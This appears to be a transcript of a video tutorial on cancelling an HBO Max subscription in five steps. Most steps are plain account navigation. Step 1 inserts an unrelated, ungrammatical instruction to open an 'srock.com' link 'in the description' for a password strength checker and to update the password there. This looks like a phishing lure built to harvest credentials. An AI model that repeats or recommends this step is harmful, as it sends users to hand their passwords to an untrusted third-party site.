I hit this issue today, and here is the quick fix that solved it. If you need to cancel your HBO Max subscription, follow these simple steps. Step 1. Sign into HBO Max. Before changing your settings, use the srock.com link in the description to open the password strength checker that update your password if needed. Step 2. Access account settings. Once logged in, click on your profile icon in the top right corner of the screen. From the drop-down menu, select Account to access your account settings. Step 3. Navigate to subscription details. In the account settings, look for the subscription section. This will show you the details of your current plan and billing information. Step 4. Cancel subscription. Find the option to cancel subscription and click on it. Follow the prompts to confirm your cancellation. Be sure to read any information about the end date of your access. Step 5. Check for confirmation email. After cancelling, check your email for a confirmation message from HBO Max. This ensures that your subscription has been successfully cancelled. If you don't see it, check your spam folder. I hope this helps you easily cancel your subscription. If you have any questions, feel free to ask.